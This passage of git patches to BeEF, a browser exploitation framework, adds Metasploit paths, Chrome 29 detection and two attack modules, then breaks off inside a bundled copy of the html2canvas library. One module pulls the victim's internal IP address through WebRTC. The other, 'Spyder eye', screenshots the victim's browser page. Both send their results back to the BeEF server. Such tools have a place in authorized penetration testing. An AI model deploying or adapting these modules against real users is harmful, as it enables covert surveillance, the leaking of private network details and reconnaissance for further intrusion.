diff --git a/config.yaml b/config.yaml
index adc8e98dc..490ebe0de 100644
--- a/config.yaml
+++ b/config.yaml
@@ -44,7 +44,7 @@ beef:
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
-          secure: true # use WebSocketSecure work only on https domain and with https support enabled in BeEF
+          secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second

From e9e085e9e143847b9f890edc8ac19f4ebdc9341b Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 17 Aug 2013 21:56:42 +0930
Subject: [PATCH 362/397] Add metasploit default path for pentoo

---
 extensions/metasploit/config.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 6c52a2f56..017d4de11 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -33,6 +33,7 @@ beef:
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},
+              {os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
               {os: 'win', path: 'c:\\metasploit-framework\\'},
               {os: 'custom', path: ''}
             ]

From db83cdd08604510b8f2f2f1336a225f3ca6e8e1c Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 19 Aug 2013 12:37:06 +0930
Subject: [PATCH 363/397] Add metasploit default path for pentoo - take 2

---
 extensions/metasploit/config.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 017d4de11..3c704f352 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -33,7 +33,8 @@ beef:
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},
-              {os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
+              #{os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
+              {os: 'pentoo', path: '/usr/lib/metasploit'},
               {os: 'win', path: 'c:\\metasploit-framework\\'},
               {os: 'custom', path: ''}
             ]

From f5b86e789417827c18db09918f3f58be035e61ab Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 19 Aug 2013 12:37:35 +0930
Subject: [PATCH 364/397] Add metasploit default path for kali

---
 extensions/metasploit/config.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 3c704f352..166915b3c 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -33,6 +33,7 @@ beef:
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},
+              {os: 'kali', path: '/usr/share/metasploit-framework/'},
               #{os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
               {os: 'pentoo', path: '/usr/lib/metasploit'},
               {os: 'win', path: 'c:\\metasploit-framework\\'},

From df4b0bce5e73de446be3125c7a35299be0a3d4bd Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 7 Sep 2013 12:56:21 +0800
Subject: [PATCH 365/397] Supports Chrome 29 detection

---
 core/main/client/browser.js | 28 +++++++++++++++++++++++++++-
 1 file changed, 27 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 774793863..05409d10c 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -596,12 +596,28 @@ beef.browser = {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 29.
+     * @example: beef.browser.isC29()
+     */
+    isC29:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 29.
+     * @example: beef.browser.isC29iOS()
+     */
+    isC29iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS();
     },
 
     /**
@@ -695,6 +711,8 @@ beef.browser = {
             C27iOS:this.isC27iOS(), // Chrome 27 on iOS
             C28:this.isC28(), // Chrome 28
             C28iOS:this.isC28iOS(), // Chrome 28 on iOS
+            C29:this.isC29(), // Chrome 29
+            C29iOS:this.isC29iOS(), // Chrome 29 on iOS
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -889,6 +907,14 @@ beef.browser = {
             return '28'
         }
         ;   // Chrome 28 for iOS
+        if (this.isC29()) {
+            return '29'
+        }
+        ;    // Chrome 29
+        if (this.isC29iOS()) {
+            return '29'
+        }
+        ;   // Chrome 29 for iOS
         if (this.isFF2()) {
             return '2'
         }

From 1b6159ebeb60851b9ebe1a8997cde2b94948a368 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 8 Sep 2013 11:09:57 +0800
Subject: [PATCH 366/397] New Module - Detect Internal IP with WebRTC. See
 Issue #929

---
 .../host/get_internal_ip_webrtc/command.js    | 60 +++++++++++++++++++
 .../host/get_internal_ip_webrtc/config.yaml   | 16 +++++
 modules/host/get_internal_ip_webrtc/module.rb | 14 +++++
 3 files changed, 90 insertions(+)
 create mode 100755 modules/host/get_internal_ip_webrtc/command.js
 create mode 100755 modules/host/get_internal_ip_webrtc/config.yaml
 create mode 100755 modules/host/get_internal_ip_webrtc/module.rb

diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js
new file mode 100755
index 000000000..e5f663ba9
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+   var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
+
+	if (RTCPeerConnection) (function () {
+
+		var addrs = Object.create(null);
+	    addrs["0.0.0.0"] = false;
+	    
+	    // Establish a connection with ICE / relay servers - in this instance: NONE
+	    var rtc = new RTCPeerConnection({iceServers:[]});
+	    if (window.mozRTCPeerConnection) {      // FF needs a channel/stream to proceed
+	        rtc.createDataChannel('', {reliable:false});
+	    };
+	    
+	    // Upon an ICE candidate being found
+	    // Grep the SDP data for IP address data
+	    rtc.onicecandidate = function (evt) {
+	        if (evt.candidate) grepSDP(evt.candidate.candidate);
+	    };
+
+	    // Create an SDP offer
+	    rtc.createOffer(function (offerDesc) {
+	        grepSDP(offerDesc.sdp);
+	        rtc.setLocalDescription(offerDesc);
+	    }, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); });
+	    
+	    function processIPs(newAddr) {
+	        if (newAddr in addrs) return;
+	        else addrs[newAddr] = true;
+	        var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
+	        beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
+	    }
+	    
+	    function grepSDP(sdp) {
+	        var hosts = [];
+	        sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
+	            if (~line.indexOf("a=candidate")) {     // http://tools.ietf.org/html/rfc4566#section-5.13
+	                var parts = line.split(' '),        // http://tools.ietf.org/html/rfc5245#section-15.1
+	                    addr = parts[4],
+	                    type = parts[7];
+	                if (type === 'host') processIPs(addr);
+	            } else if (~line.indexOf("c=")) {       // http://tools.ietf.org/html/rfc4566#section-5.7
+	                var parts = line.split(' '),
+	                    addr = parts[2];
+	                processIPs(addr);
+	            }
+	        });
+	    }
+	})(); else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection");
+	} 
+
+});
diff --git a/modules/host/get_internal_ip_webrtc/config.yaml b/modules/host/get_internal_ip_webrtc/config.yaml
new file mode 100755
index 000000000..53b964e01
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_internal_ip_webrtc:
+            enable: true
+            category: "Host"
+            name: "Get Internal IP WebRTC"
+            description: "Retrieve the internal (behind NAT) IP address of the victim machine using WebRTC Peer-to-Peer connection framework. Code from http://net.ipcalf.com/"
+            authors: ["xntrik", "@natevw"]
+            target:
+                 working: ["C", "FF"]
+                 unknown: ["All"]
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
new file mode 100755
index 000000000..3f501683a
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_internal_ip_webrtc < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end

From 3f7eec4e288950c5215cd2302aa0172c7a7b1623 Mon Sep 17 00:00:00 2001
From: Christian <preth00nker@gmail.com>
Date: Mon, 9 Sep 2013 13:52:13 -0500
Subject: [PATCH 367/397] adding generic module to take screenshoots with
 canvas

---
 modules/browser/spyder_eye/command.js     |   23 +
 modules/browser/spyder_eye/config.yaml    |   26 +
 modules/browser/spyder_eye/html2canvas.js | 2841 +++++++++++++++++++++
 modules/browser/spyder_eye/module.rb      |   23 +
 4 files changed, 2913 insertions(+)
 create mode 100644 modules/browser/spyder_eye/command.js
 create mode 100644 modules/browser/spyder_eye/config.yaml
 create mode 100644 modules/browser/spyder_eye/html2canvas.js
 create mode 100644 modules/browser/spyder_eye/module.rb

diff --git a/modules/browser/spyder_eye/command.js b/modules/browser/spyder_eye/command.js
new file mode 100644
index 000000000..fcb8ffc89
--- /dev/null
+++ b/modules/browser/spyder_eye/command.js
@@ -0,0 +1,23 @@
+
+
+beef.execute(function() {
+
+	var script = document.createElement( 'script' );
+	script.type = 'text/javascript';
+	script.src = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/html2canvas.js';
+	$j("body").append( script );
+
+	html2canvas(document.body, {
+	  onrendered: function(canvas) {
+
+        var img = canvas.toDataURL("image/png");
+        var output = img.replace(/^data:image\/(png|jpg);base64,/, "");
+
+    	beef.net.send("<%= @command_url %>", <%= @command_id %>, output);
+    	//beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=All done");
+
+	  }
+	});				
+
+
+});
\ No newline at end of file
diff --git a/modules/browser/spyder_eye/config.yaml b/modules/browser/spyder_eye/config.yaml
new file mode 100644
index 000000000..91a8df2fa
--- /dev/null
+++ b/modules/browser/spyder_eye/config.yaml
@@ -0,0 +1,26 @@
+beef:
+    module:
+        spyder_eye:
+            enable: true
+            category: "Browser"
+            name: "Spyder eye"
+            description: "This module takes a picture of the victim's browser."
+            authors: ["preth00nker"]
+            target:
+                working:
+                    IE:
+                        min_ver: 9
+                        max_ver: latest
+                    FF:
+                        min_ver: 3
+                        max_ver: latest
+                    C:
+                        min_ver: 1
+                        max_ver: latest
+                    S:
+                        min_ver: 6
+                        max_ver: latest3
+                    O:
+                        min_ver: 12
+                        max_ver: latest
+                not_working: ["All"]
\ No newline at end of file
diff --git a/modules/browser/spyder_eye/html2canvas.js b/modules/browser/spyder_eye/html2canvas.js
new file mode 100644
index 000000000..4689971cd
--- /dev/null
+++ b/modules/browser/spyder_eye/html2canvas.js
@@ -0,0 +1,2841 @@
+/*
+  html2canvas 0.4.0 <http://html2canvas.hertzen.com>
+  Copyright (c) 2013 Niklas von Hertzen (@niklasvh)
+
+  Released under MIT License
+*/
+(function(window, document, undefined){
+
+"use strict";
+
+var _html2canvas = {},
+previousElement,
+computedCSS,
+html2canvas;
+
+function h2clog(a) {
+  if (_html2canvas.logging && window.console && window.console.log) {
+    window.console.log(a);
+  }
+}
+
+_html2canvas.Util = {};
+
+_html2canvas.Util.trimText = (function(isNative){
+  return function(input){
+    if(isNative) { return isNative.apply( input ); }
+    else { return ((input || '') + '').replace( /^\s+|\s+$/g , '' ); }
+  };
+})( String.prototype.trim );
+
+_html2canvas.Util.parseBackgroundImage = function (value) {
+    var whitespace = ' \r\n\t',
+        method, definition, prefix, prefix_i, block, results = [],
+        c, mode = 0, numParen = 0, quote, args;
+
+    var appendResult = function(){
+        if(method) {
+            if(definition.substr( 0, 1 ) === '"') {
+                definition = definition.substr( 1, definition.length - 2 );
+            }
+            if(definition) {
+                args.push(definition);
+            }
+            if(method.substr( 0, 1 ) === '-' &&
+                    (prefix_i = method.indexOf( '-', 1 ) + 1) > 0) {
+                prefix = method.substr( 0, prefix_i);
+                method = method.substr( prefix_i );
+            }
+            results.push({
+                prefix: prefix,
+                method: method.toLowerCase(),
+                value: block,
+                args: args
+            });
+        }
+        args = []; //for some odd reason, setting .length = 0 didn't work in safari
+        method =
+            prefix =
+            definition =
+            block = '';
+    };
+
+    appendResult();
+    for(var i = 0, ii = value.length; i<ii; i++) {
+        c = value[i];
+        if(mode === 0 && whitespace.indexOf( c ) > -1){
+            continue;
+        }
+        switch(c) {
+            case '"':
+                if(!quote) {
+                    quote = c;
+                }
+                else if(quote === c) {
+                    quote = null;
+                }
+                break;
+
+            case '(':
+                if(quote) { break; }
+                else if(mode === 0) {
+                    mode = 1;
+                    block += c;
+                    continue;
+                } else {
+                    numParen++;
+                }
+                break;
+
+            case ')':
+                if(quote) { break; }
+                else if(mode === 1) {
+                    if(numParen === 0) {
+                        mode = 0;
+                        block += c;
+                        appendResult();
+                        continue;
+                    } else {
+                        numParen--;
+                    }
+                }
+                break;
+
+            case ',':
+                if(quote) { break; }
+                else if(mode === 0) {
+                    appendResult();
+                    continue;
+                }
+                else if (mode === 1) {
+                    if(numParen === 0 && !method.match(/^url$/i)) {
+                        args.push(definition);
+                        definition = '';
+                        block += c;
+                        continue;
+                    }
+                }
+                break;
+        }
+
+        block += c;
+        if(mode === 0) { method += c; }
+        else { definition += c; }
+    }
+    appendResult();
+
+    return results;
+};
+
+_html2canvas.Util.Bounds = function getBounds (el) {
+  var clientRect,
+  bounds = {};
+
+  if (el.getBoundingClientRect){
+    clientRect = el.getBoundingClientRect();
+
+
+    // TODO add scroll position to bounds, so no scrolling of window necessary
+    bounds.top = clientRect.top;
+    bounds.bottom = clientRect.bottom || (clientRect.top + clientRect.height);
+    bounds.left = clientRect.left;
+
+    // older IE doesn't have width/height, but top/bottom instead
+    bounds.width = clientRect.width || (clientRect.right - clientRect.left);
+    bounds.height = clientRect.height || (clientRect.bottom - clientRect.top);
+
+    return bounds;
+
+  }
+};
+
+_html2canvas.Util.getCSS = function (el, attribute, index) {
+  // return $(el).css(attribute);
+
+    var val,
+    isBackgroundSizePosition = attribute.match( /^background(Size|Position)$/ );
+
+  function toPX( attribute, val ) {
+    var rsLeft = el.runtimeStyle && el.runtimeStyle[ attribute ],
+    left,
+    style = el.style;
+
+    // Check if we are not dealing with pixels, (Opera has issues with this)
+    // Ported from jQuery css.js
+    // From the awesome hack by Dean Edwards
+    // http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291
+
+    // If we're not dealing with a regular pixel number
+    // but a number that has a weird ending, we need to convert it to pixels
+
+    if ( !/^-?[0-9]+\.?[0-9]*(?:px)?$/i.test( val ) && /^-?\d/.test( val ) ) {
+
+      // Remember the original values
+      left = style.left;
+
+      // Put in the new values to get a computed value out
+      if ( rsLeft ) {
+        el.runtimeStyle.left = el.currentStyle.left;
+      }
+      style.left = attribute === "fontSize" ? "1em" : (val || 0);
+      val = style.pixelLeft + "px";
+
+      // Revert the changed values
+      style.left = left;
+      if ( rsLeft ) {
+        el.runtimeStyle.left = rsLeft;
+      }
+
+    }
+
+    if (!/^(thin|medium|thick)$/i.test( val )) {
+      return Math.round(parseFloat( val )) + "px";
+    }
+
+    return val;
+  }
+
+    if (previousElement !== el) {
+      computedCSS = document.defaultView.getComputedStyle(el, null);
+    }
+    val = computedCSS[attribute];
+
+    if (isBackgroundSizePosition) {
+      val = (val || '').split( ',' );
+      val = val[index || 0] || val[0] || 'auto';
+      val = _html2canvas.Util.trimText(val).split(' ');
+
+      if(attribute === 'backgroundSize' && (!val[ 0 ] || val[ 0 ].match( /cover|contain|auto/ ))) {
+        //these values will be handled in the parent function
+
+      } else {
+        val[ 0 ] = ( val[ 0 ].indexOf( "%" ) === -1 ) ? toPX(  attribute + "X", val[ 0 ] ) : val[ 0 ];
+        if(val[ 1 ] === undefined) {
+          if(attribute === 'backgroundSize') {
+            val[ 1 ] = 'auto';
+            return val;
+          }
+          else {
+            // IE 9 doesn't return double digit always
+            val[ 1 ] = val[ 0 ];
+          }
+        }
+        val[ 1 ] = ( val[ 1 ].indexOf( "%" ) === -1 ) ? toPX(  attribute + "Y", val[ 1 ] ) : val[ 1 ];
+      }
+    } else if ( /border(Top|Bottom)(Left|Right)Radius/.test( attribute) ) {
+      var arr = val.split(" ");
+      if ( arr.length <= 1 ) {
+              arr[ 1 ] = arr[ 0 ];
+      }
+      arr[ 0 ] = parseInt( arr[ 0 ], 10 );
+      arr[ 1 ] = parseInt( arr[ 1 ], 10 );
+      val = arr;
+    }
+
+  return val;
+};
+
+_html2canvas.Util.resizeBounds = function( current_width, current_height, target_width, target_height, stretch_mode ){
+  var target_ratio = target_width / target_height,
+    current_ratio = current_width / current_height,
+    output_width, output_height;
+
+  if(!stretch_mode || stretch_mode === 'auto') {
+    output_width = target_width;
+    output_height = target_height;
+
+  } else {
+    if(target_ratio < current_ratio ^ stretch_mode === 'contain') {
+      output_height = target_height;
+      output_width = target_height * current_ratio;
+    } else {
+      output_width = target_width;
+      output_height = target_width / current_ratio;
+    }
+  }
+
+  return { width: output_width, height: output_height };
+};
+
+function backgroundBoundsFactory( prop, el, bounds, image, imageIndex, backgroundSize ) {
+    var bgposition =  _html2canvas.Util.getCSS( el, prop, imageIndex ) ,
+    topPos,
+    left,
+    percentage,
+    val;
+
+    if (bgposition.length === 1){
+      val = bgposition[0];
+
+      bgposition = [];
+
+      bgposition[0] = val;
+      bgposition[1] = val;
+    }
+
+    if (bgposition[0].toString().indexOf("%") !== -1){
+      percentage = (parseFloat(bgposition[0])/100);
+      left = bounds.width * percentage;
+      if(prop !== 'backgroundSize') {
+        left -= (backgroundSize || image).width*percentage;
+      }
+
+    } else {
+      if(prop === 'backgroundSize') {
+        if(bgposition[0] === 'auto') {
+          left = image.width;
+
+        } else {
+          if(bgposition[0].match(/contain|cover/)) {
+            var resized = _html2canvas.Util.resizeBounds( image.width, image.height, bounds.width, bounds.height, bgposition[0] );
+            left = resized.width;
+            topPos = resized.height;
+          } else {
+            left = parseInt (bgposition[0], 10 );
+          }
+        }
+
+      } else {
+        left = parseInt( bgposition[0], 10 );
+      }
+    }
+
+
+    if(bgposition[1] === 'auto') {
+      topPos = left / image.width * image.height;
+    } else if (bgposition[1].toString().indexOf("%") !== -1){
+      percentage = (parseFloat(bgposition[1])/100);
+      topPos =  bounds.height * percentage;
+      if(prop !== 'backgroundSize') {
+        topPos -= (backgroundSize || image).height * percentage;
+      }
+
+    } else {
+      topPos = parseInt(bgposition[1],10);
+    }
+
+    return [left, topPos];
+}
+
+_html2canvas.Util.BackgroundPosition = function( el, bounds, image, imageIndex, backgroundSize ) {
+    var result = backgroundBoundsFactory( 'backgroundPosition', el, bounds, image, imageIndex, backgroundSize );
+    return { left: result[0], top: result[1] };
+};
+_html2canvas.Util.BackgroundSize = function( el, bounds, image, imageIndex ) {
+    var result = backgroundBoundsFactory( 'backgroundSize', el, bounds, image, imageIndex );
+    return { width: result[0], height: result[1] };
+};
+
+_html2canvas.Util.Extend = function (options, defaults) {
+  for (var key in options) {
+    if (options.hasOwnProperty(key)) {
+      defaults[key] = options[key];
+    }
+  }
+  return defaults;
+};
+
+
+/*
+ * Derived from jQuery.contents()
+ * Copyright 2010, John Resig
+ * Dual licensed under the MIT or GPL Version 2 licenses.
+ * http://jquery.org/license
+ */
+_html2canvas.Util.Children = function( elem ) {
+
+
+  var children;
+  try {
+
+    children = (elem.nodeName && elem.nodeName.toUpperCase() === "IFRAME") ?
+    elem.contentDocument || elem.contentWindow.document : (function( array ){
+      var ret = [];
+
+      if ( array !== null ) {
+
+        (function( first, second ) {
+          var i = first.length,
+          j = 0;
+
+          if ( typeof second.length === "number" ) {
+            for ( var l = second.length; j < l; j++ ) {
+              first[ i++ ] = second[ j ];
+            }
+
+          } else {
+            while ( second[j] !== undefined ) {
+              first[ i++ ] = second[ j++ ];
+            }
+          }
+
+          first.length = i;
+
+          return first;
+        })( ret, array );
+
+      }
+
+      return ret;
+    })( elem.childNodes );
+
+  } catch (ex) {
+    h2clog("html2canvas.Util.Children failed with exception: " + ex.message);
+    children = [];
+  }
+  return children;
+};
+
+_html2canvas.Util.Font = (function () {
+
+  var fontData = {};
+
+  return function(font, fontSize, doc) {
+    if (fontData[font + "-" + fontSize] !== undefined) {
+      return fontData[font + "-" + fontSize];
+    }
+
+    var container = doc.createElement('div'),
+    img = doc.createElement('img'),
+    span = doc.createElement('span'),
+    sampleText = 'Hidden Text',
+    baseline,
+    middle,
+    metricsObj;
+
+    container.style.visibility = "hidden";
+    container.style.fontFamily = font;
+    container.style.fontSize = fontSize;
+    container.style.margin = 0;
+    container.style.padding = 0;
+
+    doc.body.appendChild(container);
+
+    // http://probablyprogramming.com/2009/03/15/the-tiniest-gif-ever (handtinywhite.gif)
+    img.src = "data:image/gif;base64,R0lGODlhAQABAIABAP///wAAACwAAAAAAQABAAACAkQBADs=";
+    img.width = 1;
+    img.height = 1;
+
+    img.style.margin = 0;
+    img.style.padding = 0;
+    img.style.verticalAlign = "baseline";
+
+    span.style.fontFamily = font;
+    span.style.fontSize = fontSize;
+    span.style.margin = 0;
+    span.style.padding = 0;
+
+    span.appendChild(doc.createTextNode(sampleText));
+    container.appendChild(span);
+    container.appendChild(img);
+    baseline = (img.offsetTop - span.offsetTop) + 1;
+
+    container.removeChild(span);
+    container.appendChild(doc.createTextNode(sampleText));
+
+    container.style.lineHeight = "normal";
+    img.style.verticalAlign = "super";
+
+    middle = (img.offsetTop-container.offsetTop) + 1;
+    metricsObj = {
+      baseline: baseline,
+      lineWidth: 1,
+      middle: middle
+    };
+
+    fontData[font + "-" + fontSize] = metricsObj;
+
+    doc.body.removeChild(container);
+
+    return metricsObj;
+  };
+})();
+
+(function(){
+
+  _html2canvas.Generate = {};
+
+  var reGradients = [
+  /^(-webkit-linear-gradient)\(([a-z\s]+)([\w\d\.\s,%\(\)]+)\)$/,
+  /^(-o-linear-gradient)\(([a-z\s]+)([\w\d\.\s,%\(\)]+)\)$/,
+  /^(-webkit-gradient)\((linear|radial),\s((?:\d{1,3}%?)\s(?:\d{1,3}%?),\s(?:\d{1,3}%?)\s(?:\d{1,3}%?))([\w\d\.\s,%\(\)\-]+)\)$/,
+  /^(-moz-linear-gradient)\(((?:\d{1,3}%?)\s(?:\d{1,3}%?))([\w\d\.\s,%\(\)]+)\)$/,
+  /^(-webkit-radial-gradient)\(((?:\d{1,3}%?)\s(?:\d{1,3}%?)),\s(\w+)\s([a-z\-]+)([\w\d\.\s,%\(\)]+)\)$/,
+  /^(-moz-radial-gradient)\(((?:\d{1,3}%?)\s(?:\d{1,3}%?)),\s(\w+)\s?([a-z\-]*)([\w\d\.\s,%\(\)]+)\)$/,
+  /^(-o-radial-gradient)\(((?:\d{1,3}%?)\s(?:\d{1,3}%?)),\s(\w+)\s([a-z\-]+)([\w\d\.\s,%\(\)]+)\)$/
+  ];
+
+  /*
+ * TODO: Add IE10 vendor prefix (-ms) support
+ * TODO: Add W3C gradient (linear-gradient) support
+ * TODO: Add old Webkit -webkit-gradient(radial, ...) support
+ * TODO: Maybe some RegExp optimizations are possible ;o)
+ */
+  _html2canvas.Generate.parseGradient = function(css, bounds) {
+    var gradient, i, len = reGradients.length, m1, stop, m2, m2Len, step, m3, tl,tr,br,bl;
+
+    for(i = 0; i < len; i+=1){
+      m1 = css.match(reGradients[i]);
+      if(m1) {
+        break;
+      }
+    }
+
+    if(m1) {
+      switch(m1[1]) {
+        case '-webkit-linear-gradient':
+        case '-o-linear-gradient':
+
+          gradient = {
+            type: 'linear',
+            x0: null,
+            y0: null,
+            x1: null,
+            y1: null,
+            colorStops: []
+          };
+
+          // get coordinates
+          m2 = m1[2].match(/\w+/g);
+          if(m2){
+            m2Len = m2.length;
+            for(i = 0; i < m2Len; i+=1){
+              switch(m2[i]) {
+                case 'top':
+                  gradient.y0 = 0;
+                  gradient.y1 = bounds.height;
+                  break;
+
+                case 'right':
+                  gradient.x0 = bounds.width;
+                  gradient.x1 = 0;
+                  break;
+
+                case 'bottom':
+                  gradient.y0 = bounds.height;
+                  gradient.y1 = 0;
+                  break;
+
+                case 'left':
+                  gradient.x0 = 0;
+                  gradient.x1 = bounds.width;
+                  break;
+              }
+            }
+          }
+          if(gradient.x0 === null && gradient.x1 === null){ // center
+            gradient.x0 = gradient.x1 = bounds.width / 2;
+          }
+          if(gradient.y0 === null && gradient.y1 === null){ // center
+            gradient.y0 = gradient.y1 = bounds.height / 2;
+          }
+
+          // get colors and stops
+          m2 = m1[3].match(/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\)(?:\s\d{1,3}(?:%|px))?)+/g);
+          if(m2){
+            m2Len = m2.length;
+            step = 1 / Math.max(m2Len - 1, 1);
+            for(i = 0; i < m2Len; i+=1){
+              m3 = m2[i].match(/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\))\s*(\d{1,3})?(%|px)?/);
+              if(m3[2]){
+                stop = parseFloat(m3[2]);
+                if(m3[3] === '%'){
+                  stop /= 100;
+                } else { // px - stupid opera
+                  stop /= bounds.width;
+                }
+              } else {
+                stop = i * step;
+              }
+              gradient.colorStops.push({
+                color: m3[1],
+                stop: stop
+              });
+            }
+          }
+          break;
+
+        case '-webkit-gradient':
+
+          gradient = {
+            type: m1[2] === 'radial' ? 'circle' : m1[2], // TODO: Add radial gradient support for older mozilla definitions
+            x0: 0,
+            y0: 0,
+            x1: 0,
+            y1: 0,
+            colorStops: []
+          };
+
+          // get coordinates
+          m2 = m1[3].match(/(\d{1,3})%?\s(\d{1,3})%?,\s(\d{1,3})%?\s(\d{1,3})%?/);
+          if(m2){
+            gradient.x0 = (m2[1] * bounds.width) / 100;
+            gradient.y0 = (m2[2] * bounds.height) / 100;
+            gradient.x1 = (m2[3] * bounds.width) / 100;
+            gradient.y1 = (m2[4] * bounds.height) / 100;
+          }
+
+          // get colors and stops
+          m2 = m1[4].match(/((?:from|to|color-stop)\((?:[0-9\.]+,\s)?(?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\)\))+/g);
+          if(m2){
+            m2Len = m2.length;
+            for(i = 0; i < m2Len; i+=1){
+              m3 = m2[i].match(/(from|to|color-stop)\(([0-9\.]+)?(?:,\s)?((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\))\)/);
+              stop = parseFloat(m3[2]);
+              if(m3[1] === 'from') {
+                stop = 0.0;
+              }
+              if(m3[1] === 'to') {
+                stop = 1.0;
+              }
+              gradient.colorStops.push({
+                color: m3[3],
+                stop: stop
+              });
+            }
+          }
+          break;
+
+        case '-moz-linear-gradient':
+
+          gradient = {
+            type: 'linear',
+            x0: 0,
+            y0: 0,
+            x1: 0,
+            y1: 0,
